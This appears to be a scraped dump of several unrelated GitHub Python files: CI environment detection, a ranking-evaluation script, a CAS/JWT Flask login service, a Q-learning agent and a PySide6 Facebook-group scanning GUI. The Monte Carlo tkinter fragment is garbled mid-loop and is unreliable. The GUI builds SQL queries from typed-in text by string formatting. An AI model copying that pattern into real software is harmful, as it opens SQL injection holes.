plt.show()\n","repo_name":"michalcourson/Harmonizer","sub_path":"src/Prototypes/offline_python_prototypes/Granular_Synthesis.py","file_name":"Granular_Synthesis.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25753934459","text":"from uuid import uuid4\nfrom foresight.environment.git.git_helper import GitHelper\nfrom foresight.environment.environment_info import EnvironmentInfo\nfrom foresight.utils.test_runner_utils import TestRunnerUtils\nimport os, logging\nfrom foresight.utils.generic_utils import print_debug_message_to_console\n\nLOGGER = logging.getLogger(__name__)\n\nclass AzureEnvironmentInfoProvider:\n\n ENVIRONMENT = \"Azure\"\n BUILD_BUILDID_ENV_VAR_NAME = \"BUILD_BUILDID\"\n BUILD_REPOSITORY_NAME_ENV_VAR_NAME = \"BUILD_REPOSITORY_NAME\"\n BUILD_REPOSITORY_URI_ENV_VAR_NAME = \"BUILD_REPOSITORY_URI\"\n BUILD_SOURCEBRANCHNAME_ENV_VAR_NAME = \"BUILD_SOURCEBRANCHNAME\"\n BUILD_SOURCEVERSION_ENV_VAR_NAME = \"BUILD_SOURCEVERSION\"\n BUILD_SOURCEVERSIONMESSAGE_ENV_VAR_NAME = \"BUILD_SOURCEVERSIONMESSAGE\"\n INVOCATION_ID_ENV_VAR_NAME = \"INVOCATION_ID\"\n BUILD_REPOSITORY_PROVIDER_ENV_VAR_NAME = \"BUILD_REPOSITORY_PROVIDER\"\n\n @classmethod\n def get_test_run_id(cls, repo_url, commit_hash, environment):\n configured_test_run_id = TestRunnerUtils.get_configured_test_run_id()\n if configured_test_run_id:\n return configured_test_run_id\n build_number = os.getenv(cls.BUILD_BUILDID_ENV_VAR_NAME)\n invocation_id = os.getenv(cls.INVOCATION_ID_ENV_VAR_NAME)\n test_run_key = cls.generate_test_run_key(invocation_id, build_number)\n if test_run_key:\n return TestRunnerUtils.get_test_run_id(environment, repo_url, commit_hash, test_run_key)\n else:\n return TestRunnerUtils.get_default_test_run_id(environment, repo_url, commit_hash)\n\n\n @staticmethod\n def generate_test_run_key(invocation_id=None, build_number=None):\n if invocation_id and build_number:\n return invocation_id + \"-\" + build_number\n elif invocation_id:\n return invocation_id\n elif build_number:\n return build_number\n else:\n return None\n\n @classmethod\n def build_env_info(cls):\n try:\n repo_url = os.getenv(cls.BUILD_REPOSITORY_URI_ENV_VAR_NAME)\n repo_name = os.getenv(cls.BUILD_REPOSITORY_NAME_ENV_VAR_NAME) or GitHelper.extractRepoName(repo_url)\n branch = os.getenv(cls.BUILD_SOURCEBRANCHNAME_ENV_VAR_NAME)\n commit_hash = os.getenv(cls.BUILD_SOURCEVERSION_ENV_VAR_NAME)\n commit_message = os.getenv(cls.BUILD_SOURCEVERSIONMESSAGE_ENV_VAR_NAME) or GitHelper.get_commit_message()\n 
repo_provider = os.getenv(cls.BUILD_REPOSITORY_PROVIDER_ENV_VAR_NAME)\n \n environment = cls.ENVIRONMENT + \" - \" + str(repo_provider) if repo_provider else cls.ENVIRONMENT\n\n if not branch:\n branch = GitHelper.get_branch()\n\n if not commit_hash:\n commit_hash = GitHelper.get_commit_hash()\n\n test_run_id = cls.get_test_run_id(repo_url, commit_hash, environment)\n\n env_info = EnvironmentInfo(test_run_id, environment, repo_url, repo_name, \n branch, commit_hash, commit_message)\n print_debug_message_to_console(\"Azure Environment info: {}\".format(env_info.to_json()))\n return env_info\n except Exception as err:\n print_debug_message_to_console(\"Unable to build environment info: {}\".format(err))\n LOGGER.error(\"Unable to build environment info: {}\".format(err))\n pass\n return None","repo_name":"thundra-io/thundra-agent-python","sub_path":"foresight/environment/azure/azure_environment_info_provider.py","file_name":"azure_environment_info_provider.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"18914305484","text":"import sys\n\nimport numpy as np\nimport pandas as pd\nfrom Corras.Scenario.aslib_ranking_scenario import ASRankingScenario\nfrom itertools import product\n\n# measures\nfrom scipy.stats import kendalltau, describe\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom Corras.Evaluation.evaluation import ndcg_at_k, compute_relevance_scores_unit_interval\n\n# plotting\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Database\nimport sqlalchemy as sql\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import Table, MetaData\nfrom sqlalchemy.sql import exists, select, and_, or_\nimport urllib\n\nsns.set_style(\"darkgrid\")\n\n\ndef compute_distance_to_vbs(predicted_performances, true_performances):\n result = true_performances[np.argmin(predicted_performances)] - np.min(\n true_performances)\n return result\n\n\nscenario_path = \"./aslib_data-aslib-v4.0/\"\nresults_path_corras = \"./results-lh/\"\nevaluations_path = \"./evaluations/\"\nfigures_path = \"./figures/\"\n\n# DB data\ndb_url = sys.argv[1]\ndb_user = sys.argv[2]\ndb_pw = urllib.parse.quote_plus(sys.argv[3])\ndb_db = sys.argv[4]\n\nscenarios = [\n \"CPMP-2015\",\n \"MIP-2016\",\n \"CSP-2010\",\n \"SAT11-HAND\",\n \"SAT11-INDU\",\n \"SAT11-RAND\",\n # \"CSP-Minizinc-Time-2016\",\n # \"MAXSAT-WPMS-2016\",\n # \"MAXSAT-PMS-2016\",\n # \"QBF-2016\"\n]\n\nlambda_values = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\nepsilon_values = [1.0]\nmax_pairs_per_instance = 5\nmaxiter = 100\nseeds = [1, 2, 3, 4, 5, 15]\nuse_quadratic_transform_values = [False, True]\nuse_max_inverse_transform_values = [\"max_cutoff\"]\nscale_target_to_unit_interval_values = [True]\nskip_censored_values = [False]\nregulerization_params_values = [0.001]\nuse_weighted_samples_values = [False]\nsplits = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nparams = [\n lambda_values, epsilon_values, splits, seeds,\n use_quadratic_transform_values, use_max_inverse_transform_values,\n scale_target_to_unit_interval_values, skip_censored_values,\n regulerization_params_values, use_weighted_samples_values\n]\n\nparam_product = list(product(*params))\n\nfor scenario_name in scenarios:\n\n corras_measures = []\n\n scenario = ASRankingScenario()\n scenario.read_scenario(scenario_path + scenario_name)\n scenario.compute_rankings(False)\n relevance_scores = compute_relevance_scores_unit_interval(scenario)\n\n # 
params_string = \"-\".join([scenario_name,\n    #   str(lambda_value), str(split), str(seed), str(use_quadratic_transform), str(use_max_inverse_transform), str(scale_target_to_unit_interval)])\n\n    filename = \"linhinge_test-\" + scenario_name + \".csv\"\n    # loss_filename = \"pl_log_linear\" + \"-\" + params_string + \"-losses.csv\"\n    filepath = results_path_corras + filename\n    # print(filepath)\n    # loss_filepath = results_path_corras + loss_filename\n    corras = None\n    try:\n        table_name = \"ki2020_linhinge-\" + scenario_name\n\n        engine = sql.create_engine(\"mysql://\" + db_user + \":\" + db_pw + \"@\" +\n                                   db_url + \"/\" + db_db,\n                                   echo=False)\n        connection = engine.connect()\n        corras = pd.read_sql_table(table_name=table_name, con=connection)\n        connection.close()\n    except Exception as exc:\n        print(\"Table for \" + scenario_name +\n              \" not found in corras result data! Exception \" + str(exc))\n        continue\n    # for lambda_value, split, seed, use_quadratic_transform, use_max_inverse_transform, scale_target_to_unit_interval in param_product:\n    # print(corras.head())\n    corras.set_index(\"problem_instance\", inplace=True)\n    performance_indices = [\n        x for x in corras.columns if x.endswith(\"_performance\")\n    ]\n\n    # lambda_values = pd.unique(corras[\"lambda\"])\n    # epsilon_values = pd.unique(corras[\"epsilon\"])\n    # print(lambda_values)\n    # print(epsilon_values)\n\n    # print(scenario.performance_data)\n    # print(relevance_scores)\n\n    for lambda_value, epsilon_value, split, seed, use_quadratic_transform, use_max_inverse_transform, scale_target_to_unit_interval, skip_censored, regulerization_param, use_weighted_samples in param_product:\n        test_scenario, train_scenario = scenario.get_split(split)\n\n        current_frame = corras.loc[\n            (corras[\"lambda\"] == lambda_value)\n            & (corras[\"epsilon\"] == epsilon_value) & (corras[\"split\"] == split)\n            & (corras[\"seed\"] == seed) &\n            (corras[\"use_quadratic_transform\"] == use_quadratic_transform) &\n            (corras[\"use_max_inverse_transform\"] == use_max_inverse_transform)\n            & (corras[\"scale_target_to_unit_interval\"] ==\n               scale_target_to_unit_interval)\n            & (corras[\"skip_censored\"] == skip_censored)\n            & (corras[\"regulerization_param\"] == regulerization_param)\n            & (corras[\"use_weighted_samples\"] == use_weighted_samples)]\n        # current_frame = corras.loc[(corras[\"lambda\"] == lambda_value)]\n        # print(current_frame)\n        if len(current_frame) != len(test_scenario.performance_data):\n            print(\n                f\"The frame contains {len(current_frame)} entries, but the {scenario_name} contains {len(test_scenario.performance_data)} entries in split {split} seed {seed}!\"\n            )\n            continue\n        for problem_instance, performances in test_scenario.performance_data.iterrows(\n        ):\n            # if not problem_instance in current_frame.index:\n            #     continue\n            true_performances = scenario.performance_data.loc[\n                problem_instance].astype(\"float64\").to_numpy()\n            true_ranking = scenario.performance_rankings.loc[\n                problem_instance].astype(\"float64\").to_numpy()\n            # print(current_frame.loc[problem_instance])\n            tau_corr = 0\n            tau_p = 0\n            ndcg = 0\n            mse = 0\n            mae = 0\n            abs_vbs_distance = 0\n            par10 = 0\n            run_stati = scenario.runstatus_data.loc[problem_instance]\n            # print(corras)\n            corras_performances = current_frame.loc[problem_instance][\n                performance_indices].astype(\"float64\").to_numpy()\n            corras_ranking = current_frame.loc[problem_instance][\n                performance_indices].astype(\"float64\").rank(\n                    method=\"min\").astype(\"int16\").to_numpy()\n            if not np.isfinite(corras_performances).all():\n                print(\"Warning, non-finite values in performance 
prediction for \" +\n                      problem_instance + \"!\")\n                continue\n            tau_corr, tau_p = kendalltau(true_ranking, corras_ranking)\n            mse = mean_squared_error(true_performances, corras_performances)\n            mae = mean_absolute_error(true_performances, corras_performances)\n            abs_vbs_distance = compute_distance_to_vbs(corras_performances,\n                                                       true_performances)\n            ndcg = ndcg_at_k(corras_ranking,\n                             relevance_scores.loc[problem_instance].to_numpy(),\n                             len(scenario.algorithms))\n            par10 = true_performances[np.argmin(corras_performances)]\n            run_status = run_stati.iloc[np.argmin(corras_performances)]\n            corras_measures.append([\n                split, seed, problem_instance, lambda_value, epsilon_value,\n                use_quadratic_transform, use_max_inverse_transform,\n                scale_target_to_unit_interval, skip_censored,\n                regulerization_param, use_weighted_samples, tau_corr, tau_p,\n                ndcg, mse, mae, abs_vbs_distance, par10, run_status\n            ])\n        # print(corras_measures)\n    df_corras = pd.DataFrame(\n        data=corras_measures,\n        columns=[\n            \"split\", \"seed\", \"problem_instance\", \"lambda\", \"epsilon\",\n            \"quadratic_transform\", \"max_inverse_transform\",\n            \"scale_to_unit_interval\", \"skip_censored\", \"regularization_param\",\n            \"use_weighted_samples\", \"tau_corr\", \"tau_p\", \"ndcg\", \"mse\", \"mae\",\n            \"abs_distance_to_vbs\", \"par10\", \"run_status\"\n        ])\n    df_corras.to_csv(evaluations_path + \"ki2020-linhinge-\" + scenario_name +\n                     \".csv\")\n","repo_name":"JonasHanselle/CoRRAS","sub_path":"evaluation/evaluation_lin_hinge.py","file_name":"evaluation_lin_hinge.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29906538566","text":"from Model.Proprocessing import preprocess, split, scale\nimport json\nimport pickle as pk\nimport os\nimport pandas as pd\n\n\ndef prediction(df, pkmodel, model_name=None, data=None):\n    path = os.getcwd()\n    models = os.listdir(f'{path}/pkmodel')\n\n    if pkmodel == 'best':\n        model_name = next(m for m in models if 'best' in m)  # first saved model whose filename contains 'best'\n        data = model_name.split('_')[2]\n    elif pkmodel == 'auto':\n        model_name = f'{model_name}_{data}_model.pkl'\n\n    # data preprocess\n    # df = pd.read_excel(df_name)\n    df = preprocess(df, train=False)\n    X, y = split(df)  # Data splitting\n    if data == 'scale':\n        X = scale(X)  # Scale\n    elif data == 'pca':\n        pca = pk.load(open(f'{path}/pkmodel/pca.pkl', 'rb'))\n        X = scale(X)\n        X = pca.transform(X)\n\n    model = pk.load(open(f'{path}/pkmodel/{model_name}', 'rb'))\n    predict = model.predict(X)\n\n    return predict, model_name\n\n","repo_name":"Capstone-SRL/SRL","sub_path":"Model/Model_prediction.py","file_name":"Model_prediction.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25850984371","text":"import os\nimport requests\nimport jwt\nimport sys\n\nfrom flask import Flask, request, jsonify, abort\nfrom flask_cors import cross_origin, CORS\n\napp = Flask(__name__)\nCORS(app, support_credentials=True)\n\nSERVICE = \"https://hebi.diamond.ac.uk/launcher/\"\nCAS_SERVER = \"https://auth.diamond.ac.uk/cas\"\nCAS_VALIDATE_URL = \"{}/serviceValidate\".format(CAS_SERVER)\nJWT_ALGORITHM = 'HS256'\n\n\ndef process_token(token):\n    '''\n    Decode the JWT that is the cookie in the user's web browser\n    '''\n    try:\n        payload = jwt.decode(token, os.environ['JWT_KEY'], algorithms=[JWT_ALGORITHM])\n    except Exception as e:\n        raise KeyError(str(e))\n    return payload\n\n\n@app.route('/')\ndef check_for_cookie():\n    '''\n    Check if the HTTP 
request that came from the launcher web app in the\n    browser has a cookie that denotes if a user has authenticated to the\n    launcher\n    '''\n    cookie = request.cookies.get('token')\n    payload = {}\n\n    if cookie is None:\n        # unauthorised user requesting access\n        abort(403)\n    else:\n        # check the token to see if the 'username' value in it matches the\n        # owner of the Hebi session (which is defined in the FEDID env var)\n        decoded_token = process_token(cookie)\n\n        if 'username' not in decoded_token:\n            # something is wrong with the token, so deny access\n            payload['has_requestor_been_authenticated'] = False\n            return jsonify(payload)\n        else:\n            # token has the username, so they have been authenticated to get to\n            # the launcher page\n            payload['has_requestor_been_authenticated'] = True\n            payload['username'] = decoded_token['username']\n\n    return jsonify(payload)\n\n\n@app.route('/validate_ticket')\ndef validate_ticket():\n    '''\n    Validate a ticket that was handed to the user's web browser by the CAS\n    server\n    '''\n    data = request.args.to_dict()\n    params = {\n        'format': 'json',\n        'ticket': data['ticket'],\n        'service': SERVICE\n    }\n    auth_req = requests.get(CAS_VALIDATE_URL, params=params)\n\n    # used for holding info about the validation request\n    output_dict = {\n        'validated': False \n    }\n\n    # check the CAS server response to the validation request\n    try:\n        auth_resp = auth_req.json()\n    except Exception as e:\n        output_dict['desc'] = 'invalid_CAS_server_response'\n        output_dict['validated'] = False\n        return jsonify(output_dict)\n\n    if 'authenticationSuccess' in auth_resp['serviceResponse']:\n        username = auth_resp['serviceResponse']['authenticationSuccess']['user']\n        output_dict['validated'] = True\n        output_dict['user'] = username\n        output_dict['desc'] = 'successful authentication'\n\n        # create a token from the ticket validation that has the user's FedID\n        # stored in it\n        payload = {\n            'username': username\n        }\n        token = jwt.encode(payload, os.environ['JWT_KEY'], algorithm=JWT_ALGORITHM)\n        output_dict['token'] = token\n        resp = jsonify(output_dict)\n\n        # set a cookie in the client's web browser\n        resp.set_cookie('token', token)\n    elif 'authenticationFailure' in auth_resp['serviceResponse']:\n        output_dict['validated'] = False\n        output_dict['code'] = auth_resp['serviceResponse']['authenticationFailure']['code']\n        output_dict['desc'] = auth_resp['serviceResponse']['authenticationFailure']['description']\n        resp = jsonify(output_dict)\n    else:\n        # something else went wrong\n        output_dict['validated'] = False\n        output_dict['desc'] = 'invalid_CAS_server_response'\n        resp = jsonify(output_dict)\n\n    return resp\n\n\ndef main(argv):\n\n    if os.environ['FLASK_MODE'] == 'production':\n        import bjoern\n        bjoern.run(app, '127.0.0.1', port=8086)\n    else:\n        app.run(host='0.0.0.0', port=8086, debug=True, use_reloader=True,\n                threaded=True)\n\n\nif __name__ == '__main__':\n    main(sys.argv[1:])\n","repo_name":"yousefmoazzam/hebi-launcher","sub_path":"cas-auth/cas-auth.py","file_name":"cas-auth.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9866409788","text":"from tkinter import *\r\nfrom random import uniform \r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nroot = tk.Tk()\r\nroot.title(\"MONTE CARLO METHOD: EXERCISE 2\")\r\nroot.geometry('790x680+400+5')\r\n#root.resizable(False, True)\r\nroot.configure(background=\"hotpink4\")\r\n\r\n\r\nlbl1=tk.Label(root,text='The value of a stock changes \n 
daily according to the following scheme', background=\"gold\")\r\nlbl1.place(x=25,y=10)\r\n\r\narea=('Change in price', 'Probability')\r\n\r\nac=('all','n')\r\nsales_data=[('-1/8','3/36'),\r\n            ('no change','7/36'),\r\n            ('+1/8','16/36'),\r\n            ('+1/2','7/36'),\r\n            ('+1','3/36')\r\n            ]\r\n\r\ntv=ttk.Treeview(root,columns=ac,show='headings',height=5)\r\nfor i in range(2):\r\n    tv.column(ac[i],width=140,anchor='center', stretch=tk.NO)\r\n    tv.heading(ac[i],text=area[i])\r\ntv.place(x=20,y=60)\r\n\r\nfor i in range(5):\r\n    tv.insert('','end',values=sales_data[i])\r\n    \r\n\r\ndef intervalos():\r\n    a4=[]\r\n    a5=[]\r\n    i=0\r\n    sum=0\r\n    while(ia[1][0] and naa[2][0] and naa[3][0] and naa[4][0] and na List:\n    return [member for member in members if not member.bot]\n\n\ndef generate_teams(members: List, number_of_teams: int):\n    random.shuffle(members)\n    return [list(team) for team in np.array_split(members, number_of_teams)]\n\n\ndef get_channel_by_name(channels, name):\n    for c in channels:\n        if c.name == name:\n            return c\n    return None\n\n\ndef get_channel_by_position(channels, index):\n    for c in channels:\n        if c.position == index:\n            return c\n    return None\n\n\ndef get_voice_channel(ctx, arg):\n    channels = ctx.guild.voice_channels\n    c = get_channel_by_name(channels, arg)\n    if c is None and arg.isdigit():\n        c = get_channel_by_position(channels, int(arg)-1)\n    return c\n\n\nasync def move_members(bot, members, channel):\n    for m in members:\n        await m.move_to(channel)\n","repo_name":"mat-sop/random_team","sub_path":"random_team/cogs/utils/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1481623388","text":"\n\nfrom RLAgent import RLAgent\n\n# Import wandb for logging the agents' runs.\nimport wandb\n\nimport gym\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass QAgent(RLAgent):\n    \"\"\"\n    A class used to build Q-learning algorithms.\n    \n    This subclass of RLAgent makes it possible to build Q-learning algorithms with\n    externally specified (hyper-)parameters and provides the necessary methods\n    for training an algorithm.\n    \n    Attributes\n    ----------\n    env : env\n        The environment of a RL algorithm.\n    \n    gamma : float\n        The discount factor for future rewards.\n    \n    learning_rate : float\n        The learning rate.\n    \n    epsilon : float\n        The exploration rate used for epsilon-greedy action selection.\n    \n    epsilon_min : float\n        The minimum epsilon value.\n    \n    epsilon_decay : float\n        The epsilon decay.\n    \n    divisor : int or float\n        Number used in learning rate decay.\n    \n    buckets : tuple of ints\n        Tuple used to discretize the observation space.\n    \n    training_episodes : int\n        Maximum number of training episodes.\n    \n    testing_episodes : int\n        Maximum number of testing episodes.\n    \n    frames : int\n        Maximum number of frames during an episode.\n    \n    Methods\n    -------\n    discretize(state)\n        Takes a continuous state and returns a discretized state.\n    \n    get_action(state, epsilon)\n        Chooses and returns an action from the action space.\n    \n    update_Q(state, action, reward, next_state, learning_rate)\n        Updates the state-action pairs and Q values in the Q-table.\n    \n    run()\n        Loop to train the Q-agent.\n    \"\"\"\n    \n    def __init__(self, env, gamma, learning_rate, epsilon, epsilon_min, epsilon_decay, divisor,\n                 buckets, training_episodes, testing_episodes, frames):\n        \n        RLAgent.__init__(self, env, training_episodes, testing_episodes, frames)\n        self.env = env\n        self.gamma = gamma\n        self.learning_rate = learning_rate\n        
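# Sketch of what follows (standard tabular Q-learning): self.Q below is a\n        # table indexed by the discretized state tuple plus an action, and\n        # update_Q applies the TD update\n        #   Q[s][a] += lr * (reward + gamma * max(Q[next_s]) - Q[s][a])\n        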
self.epsilon = epsilon\n self.epsilon_min = epsilon_min\n self.epsilon_decay = epsilon_decay\n self.divisor = divisor \n self.buckets = (3,3,6,6,)\n \n self.Q = np.zeros(self.buckets + (self.env.action_space.n,))\n \n def discretize(self, state):\n upper_bounds = [self.env.observation_space.high[0], 0.5,\n self.env.observation_space.high[2], math.radians(50)]\n \n lower_bounds = [self.env.observation_space.low[0], -0.5,\n self.env.observation_space.low[2], -math.radians(50)]\n \n ratios = [(state[i] + abs(lower_bounds[i])) /\n (upper_bounds[i] - lower_bounds[i])\n for i in range(len(state))]\n \n discretized_state = [int(round((self.buckets[i] - 1) *ratios[i]))\n for i in range(len(state))]\n \n discretized_state = [min(self.buckets[i] -1,\n max(0, discretized_state[i]))\n for i in range(len(state))]\n \n return tuple(discretized_state)\n \n def get_action(self, state, epsilon):\n return self.env.action_space.sample() if (\n np.random.random() <= epsilon) else np.argmax(self.Q[state])\n \n def update_Q(self, state, action, reward, next_state, learning_rate):\n self.Q[state][action] += learning_rate * (\n reward + self.gamma * np.max(\n self.Q[next_state]) - self.Q[state][action])\n \n def run(self):\n print(\"running\")\n for episode in range(self.training_episodes):\n \n episode_reward = 0\n discretized_state = self.discretize(self.env.reset())\n done = False\n \n while not done:\n \n action = self.get_action(discretized_state, self.epsilon)\n state, reward, done, info = self.env.step(action)\n next_state = self.discretize(state)\n self.update_Q(discretized_state, action, reward, next_state,\n self.learning_rate)\n discretized_state = next_state\n # env.render()\n episode_reward += reward\n average_reward = np.mean(self.training_episode_rewards)\n \n if average_reward > 200:\n break\n \n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n \n self.training_episode_rewards.append(episode_reward)\n self.training_average_rewards.append(average_reward)\n print(\"Episode: {}, total_reward: {:.2f}, Epsilon: {:.2f}\".format(\n episode, episode_reward, self.epsilon))\n \n \n self.env.close()\n \n","repo_name":"JonasRosenzweig/RLProject","sub_path":"PythonCode/Main/QLearning.py","file_name":"QLearning.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13091937679","text":"from PySide6.QtWidgets import QWidget,QWidgetAction\nfrom PySide6.QtWidgets import QWidget, QMenu,QInputDialog,QLineEdit,QHeaderView\nfrom PySide6.QtCore import QSortFilterProxyModel,QRegularExpression, Qt,QItemSelectionModel\nfrom PySide6.QtSql import QSqlTableModel\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom PySide6.QtWidgets import (QApplication, QMenu, QFrame, QVBoxLayout, QSizePolicy,QPushButton,\n QWidget)\nfrom views.ui.fanpages.joined_groups_ui import Ui_JoinedGroup\nfrom views.table_custome import TableCustome\nfrom controllers.main_ctrl import MainController\nimport logging\n\nclass CustomProxyModel(QtCore.QSortFilterProxyModel):\n def __init__(self, parent=None):\n super().__init__(parent)\n self._filters = dict()\n\n @property\n def filters(self):\n return self._filters\n def clearFilters(self):\n self._filters.clear()\n def flags(self, index):\n return Qt.ItemIsSelectable | Qt.ItemIsEnabled | Qt.ItemIsEditable\n def setFilter(self, expresion, column):\n if expresion:\n self._filters[column] = expresion\n elif column in self._filters:\n del self._filters[column]\n 
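# Each column keeps at most one regex; filterAcceptsRow below ANDs them,\n        # so e.g. (illustrative) setFilter('admin', 1) plus setFilter('^http', 3)\n        # keeps only rows whose column 1 matches 'admin' and whose column 3\n        # starts with 'http'.\n        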
self.invalidateFilter()\n\n def filterAcceptsRow(self, source_row, source_parent):\n for column, expresion in self._filters.items():\n text = self.sourceModel().index(source_row, column, source_parent).data()\n regex = QRegularExpression(\n expresion, QRegularExpression.CaseInsensitiveOption\n )\n if not regex.match(text).hasMatch():\n return False\n return True\n\nclass GroupView(QWidget):\n def __init__(self, controller: MainController):\n super(GroupView, self).__init__()\n self._controller = controller\n self.ui = Ui_JoinedGroup()\n self.ui.setupUi(self)\n self.activeUID = None\n \n self._controller.signals.scan_group_completed.connect(self.refresh)\n\n \n self.verticalLayout = QVBoxLayout(self.ui.tbl_group)\n self.table_group_view = TableCustome()\n self.verticalLayout.addWidget(self.table_group_view)\n\n\n self.model = QSqlTableModel(self)\n # self.model.setQuery('SELECT * from fanpages')\n # self.model.select()\n # self.table_group_view.ui.tableView.setModel(self.model)\n\n #TODO: show model in table with custome condition\n self.page_model = QSqlTableModel(self)\n self.page_model.setQuery('SELECT * from fanpages')\n self.page_model.select()\n\n self.acc_model = QSqlTableModel(self)\n self.acc_model.setQuery('SELECT * FROM accounts')\n self.ui.cb_uids.setModel(self.acc_model)\n self.ui.cb_uids.setModelColumn(1)\n\n # self.ui.cb_pages.setModel(self.page_model)\n # self.ui.cb_pages.setModelColumn(2) \n \n self.ui.cb_uids.installEventFilter(self)\n\n self.ui.btn_view_group.clicked.connect(self.show_default_group)\n self.ui.btn_view_scan_group.clicked.connect(self.show_scan_group_by_keyword)\n self.ui.btn_scan_by_key.clicked.connect(self.scan_groups_by_keyword)\n self.ui.btn_posts.clicked.connect(self.view_posts_table)\n self.ui.btn_history_posts.clicked.connect(self.scan_post_history)\n\n self.table_group_view.ui.tableView.setContextMenuPolicy(QtGui.Qt.CustomContextMenu)\n self.table_group_view.ui.tableView.customContextMenuRequested.connect(self.open_group_menu)\n\n\n self.horizontalHeader = self.table_group_view.ui.tableView.horizontalHeader()\n self.horizontalHeader.sectionClicked.connect(self.on_view_horizontalHeader_sectionClicked)\n\n # self.headers = self.table_group_view.ui.tableView.horizontalHeader()\n self.horizontalHeader.setContextMenuPolicy(QtGui.Qt.CustomContextMenu)\n self.horizontalHeader.customContextMenuRequested.connect(self.header_popup)\n \n # self.horizontalHeader.setSectionResizeMode(0, QHeaderView.ResizeMode.ResizeToContents)\n # self.table_group_view.ui.tableView.setColumnWidth(0,10)\n self.table_group_view.ui.tableView.setColumnWidth(1,100)\n self.on_init()\n\n def scan_post_history(self):\n selected_ids = []\n selected_ids.append(self.ui.cb_uids.currentText())\n loop_scan, ok = QInputDialog.getInt(self, \"Quét history post\",\n \"Loop Scan:\", 1, 1, 100, 1)\n if not ok:\n return\n self._controller.signals.scan_post_history.emit(selected_ids , loop_scan, 1)\n def header_popup(self, pos) :\n self.header_right_click_column = self.horizontalHeader.logicalIndexAt(pos)\n menu = QMenu()\n ql = QLineEdit()\n ql.textChanged.connect(self.onTextChanged)\n wAction = QWidgetAction(self)\n wAction.setDefaultWidget(ql)\n menu.addAction(wAction)\n action = menu.exec_(self.table_group_view.ui.tableView.mapToGlobal(pos))\n\n def onTextChanged(self, text):\n self.proxy.setFilter(text, self.header_right_click_column)\n def open_group_menu(self, position):\n indexes = self.table_group_view.ui.tableView.selectionModel().selectedRows()\n if not indexes:\n return\n \n \n # 
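Note: with a QSortFilterProxyModel installed, view indexes generally must\n        # be mapped through proxy.mapToSource(index) before indexing the source\n        # model; the commented-out variant below shows that mapping:\n        # 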
selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows(0)\n\n # self.seleted_id = [self.model.data(self.proxy.mapToSource(index)) for index in sorted(selected_indexs)] \n selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows()\n\n self.seleted_id = [self.table_group_view.ui.tableView.model().data(i) for i in sorted(selected_indexs)]\n \n menu = QMenu()\n table_delete_action = QtGui.QAction(\"Delete: {}\".format(len(self.seleted_id)), self)\n edit_type = QtGui.QAction(\"Edit Type\", self)\n menu.addAction(edit_type)\n menu.addAction(table_delete_action)\n edit_type.triggered.connect(self.edit_type)\n table_delete_action.triggered.connect(self.delete_selected_row)\n \n\n if self.active_tb == 'groups_tita':\n check_allow_page_interact = QtGui.QAction(\"Kiểm tra nhóm chấp nhận tương tác Page\")\n menu.addAction(check_allow_page_interact)\n check_allow_page_interact.triggered.connect(self.on_check_allow_page_interact)\n elif self.active_tb == 'posts':\n menu.removeAction(edit_type)\n scan_approve_post = QtGui.QAction(\"Quét approve post\", self)\n menu.addAction(scan_approve_post)\n scan_approve_post.triggered.connect(self.on_scan_approve_post)\n else:\n filter_notsave = QtGui.QAction(\"Lọc nhóm chưa lưu\", self)\n save_action = QtGui.QAction(\"Lưu\", self)\n menu.addAction(filter_notsave)\n menu.addAction(save_action)\n save_action.triggered.connect(self.save_database)\n filter_notsave.triggered.connect(self.filter_notsave)\n \n action = menu.exec_(self.table_group_view.ui.tableView.mapToGlobal(position))\n\n def on_check_allow_page_interact(self):\n COLUMN_GROUP_LINK = 1\n uid = self.ui.cb_uids.currentText()\n selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows(COLUMN_GROUP_LINK)\n\n self.group_links = [self.table_group_view.ui.tableView.model().data(i) for i in sorted(selected_indexs)]\n\n self._controller.signals.check_group_allow_page.emit(uid, self.group_links)\n def on_scan_approve_post(self):\n uid = self.ui.cb_uids.currentText()\n selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows(3)\n\n self.post_links = [self.table_group_view.ui.tableView.model().data(i) for i in sorted(selected_indexs)]\n\n self._controller.signals.check_approval_post.emit(uid, self.post_links)\n\n def filter_notsave(self):\n sql_query = \"DELETE FROM {} WHERE {}.Group_Link IN (SELECT Group_Link FROM groups_tita)\".format(self.active_tb, self.active_tb)\n self.model.setQuery(sql_query)\n if self.model.lastError().isValid():\n logging.error(self.model.lastError().text())\n \n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select()\n self.refresh_header_size()\n\n def edit_type(self):\n g_type, ok = QInputDialog.getText(self, \"Edit Type\",\n \"Type:\", QLineEdit.Normal,None)\n if not ok:\n return\n \n sql_query = \"UPDATE {} SET Type='{}' WHERE 